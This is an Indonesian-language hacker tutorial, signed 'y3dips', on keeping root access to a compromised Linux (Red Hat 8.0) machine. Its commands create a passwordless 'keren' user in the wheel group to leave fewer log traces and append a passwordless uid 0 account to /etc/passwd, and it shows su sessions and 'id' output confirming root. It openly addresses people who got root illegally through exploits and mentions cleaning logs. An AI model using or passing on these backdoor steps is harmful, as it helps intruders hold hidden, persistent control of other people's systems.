#========================================BAckdooring di linux===================================

ditulis oleh : echo staff (y3dips)

Membuat Akses Super user Di Linux  (di coba di linux ReDHat 8.0) 
=================================================================

#Tahap pembuatan

Setelah berhasil mendapat akses root; baik secara
legal ataupun tidak
(dengan eksploit; misalnya local eksploits)
maka kita dapat melakukan pembuatan backdoor;
dengan cara:
1. Pastikan anda sudah sebagai root, caranya:
dari konsol ketikkan "id" , apabila muncul uid=0(root) dst....
maka anda telah berada di root.
2. kita buat user biasa terlebih dahulu, caranya:
dari konsol anda ketikkan
	/usr/sbin/useradd keren -g wheel -s /bin/bash -d /home/keren
yang maksudnya kurang lebih:
tambahkan user keren, sebagai anggota group wheel (default)
dengan shell bash dan directorynya /home/keren/
selanjutnya, anda perlu menghilangkan password buat user ini untuk 
setiap kali login, dengan tujuan diantaranya untuk menggurangi 
log/jejak anda saat kembali, dengan perintah: 
passwd -d keren 
,sehingga setiap anda login dengan login name "keren" 
anda tidak perlu menginputkan password apapun
3. Setelah itu anda bisa mengetikkan: 
[root@localhost y3dips]# echo "y3dips::0:0::/.y3dips:/bin/bash" >> /etc/passwd
yang maksudnya kurang lebih:
menambahkan user y3dips secara langsung ke file etc/passwd 
dengan sintax ">>" yang berarti menambahkan, serta memberikan shell bash
kepada user "y3dips".
=========================================================
#Tahap pengujian:

1. Setiap anda mau login ke komputer yang telah anda buatkan usernya
dan ingin memiliki privelege root; pertama-tama anda harus login
sebagai user biasa (yang juga telah anda buatkan) sesuai contoh diatas
yaitu "keren" 
	login : keren
	[keren@localhost keren]$
berarti anda telah masuk sebagai user biasa;
2. Dari user biasa anda coba masuk ke user y3dips
	[keren@localhost keren]$ su y3dips
	bash-2.05b#
akan tampil bash-2.05b# <<anda masuk sebagai modus single user
anda tampak tidak familiar dengan ini? tidak masalah, padahal dia
sudah memiliki akses root, coba buktikan: 
	bash-2.05b#id
	uid=0(root) gid=0(root) groups=0(root)
tetapi beberapa sintax tidak berlaku; makanya anda perlu mengetikkan
su root; dan anda akan langsung masuk sebagai root tanpa password
 	bash-2.05b# su root
	[root@localhost root]#
dan sekarang anda bisa menikmati hasil jerih payah anda:

"CATATAN":
=========
Penulis mencobanya di pc stand-alone artinya anda berbuat tersebut 
harus secara remote,(perbedaan jelas ada, tetapi caranya tetap sama;
penulis berjanji akan mencoba menuliskan versi secara remote, soalnya
saat menulis ini penulis langsung mencoba di pc yang dipakai, 
sedangkan detilnya tulisan yang muncul saat remote penulis sudah lupa,
:-) maklum sudah tua ;-P") soal software yang dipakai terserah; tetapi 
penulis menyarankan putty (sekalian untuk akses di shell account
yang anda miliki/ konsole anda serta untuk mengeksekusi exploits)

Ingat tulisan ini hanya membahas bagaimana membuat user yang dapat 
memberikan anda akses sebagai root; 
masih banyak yang anda butuhkan untuk bekerja;
seperti membersihkan log yang tersisa,
bagaimana mendapatkan akses root sebelumnya agar ini bisa terlaksana,
bagaimana membuat backdoor, sehingga cara diatas bisa digunakan;
Kalau penulis punya waktu lebih banyak, mungkin akan penulis bahas
di lain kesempatan.
 
"long life for hacker"


===========================================================================================EOF]